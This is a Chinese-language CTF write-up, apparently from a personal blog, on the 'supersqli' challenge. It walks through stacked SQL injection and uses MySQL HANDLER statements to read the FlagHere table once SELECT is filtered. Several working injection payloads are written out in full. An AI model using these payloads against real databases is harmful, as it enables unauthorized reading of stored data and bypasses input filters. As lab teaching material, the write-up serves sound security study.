sql注入 --堆叠注入以及handler语法
利用handler进行sql注入
1.打开题目就是一个输入框
2.输入查看一下过滤
过滤了很多,之后可以尝试第一种方法堆叠注入
1';show databases-- + (#)
3.之后查表
show tables from supersqli-- +
4.之后查询字段
show columns from FlagHere-- +
5.到了这里还没有读取到数据,又过滤了select函数 可以使用不怎么常见的handler语法
参考
https://blog.csdn.net/qq_44927883/article/details/110469781
6.使用handler 读取数据 这个handler只能一行一行的读取使用read first、next、prev、last等函数去读取,详细的可以参考上面的文章
1.打开表
handler table_name open
2.读取第一行
handler table_name read first或者(next)
3.关闭表
handler table_name close
针对这个题所以使用
';handler FlagHere open;handler FlagHere read next;handler FlagHere close;#或者-- +
本文作者:Running_J
本文链接:https://www.cnblogs.com/ArcherCY/p/16724018.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具